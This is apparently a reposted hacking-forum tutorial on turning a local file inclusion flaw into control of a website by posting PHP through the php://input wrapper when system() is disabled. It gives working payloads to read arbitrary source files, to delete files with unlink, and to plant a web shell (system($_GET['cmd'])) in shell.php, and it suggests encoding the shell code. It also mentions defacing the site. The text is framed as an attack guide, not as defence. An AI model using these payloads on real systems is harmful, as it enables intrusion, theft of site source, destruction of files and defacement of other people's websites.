Requirements : Site vulnerable to LFI Shell Php wrappers musn't be disabled Brain (that can be usefull) Introduction : You found an LFI vulnerability on a website and you want to shelled it but the configuration of server doesn't allow the utilization of system, shell_exec etc. Error you would must see : Code: PHP Warning: system() has been disabled for security reasons in /home/dir/public_html/index.php on line 374 So you can use /proc/self/environ method but if it doesn't work you cannot upload your shell or your deface page by system function. Exploitation : The purpose of this method will be to inject php code into the page to receive expected data from the server. Another way to read the source : Example of URL : Code: http:// www.2cto.com /index.php?page=php://input The php://input is very important. Open your hackbar and click in "Load URL" then click on "Enable Post Data" and write this in "Post Data". PHP Code: <? echo "<textarea>".file_get_contents('NAMEFILE.EXT')."<textarea>"; ?> The server will return the source code including php in textarea, I use a textarea because on some website it is very unreadable. Another way to delete a page: Same step that above but in "Post Data" you will write : PHP Code: <? unlink('NAMEFILE.EXT'); ?> Another way to upload your shell: If you don't have knowledge in php it will be a little bit difficult, don't be absentminded . This time in "Post Data" you will write : PHP Code: $f = fopen('shell.php','a+'); fwrite($f,'**');//I used fwrite because fputs was disabled fclose($f); ** = Some explanations is needed, so instead of ** put your code but be careful i'm sure your code contain a lot of quote and you will must escape it. So I recommended you to use an encryption that is decrypt when the php code is excuted because the encryption won't contain quote. An example : PHP Code: <? $f = fopen('shell.php','a+'); fwrite($f,'<?php system($_GET[\'cmd\']); ?>');//I used fwrite because fputs was disabled fclose($f); ?> The real code that is create on the page is : PHP Code: <?php system($_GET['cmd']); ?> Go on page and to use the script, do like that :
So I think it's all, I hope it will be helpful and you liked it. If you don't understand something or just talk about this method PM me 摘自 JUST FUCK IT!查看更多关于How to bypass the restriction of the system functi的详细内容...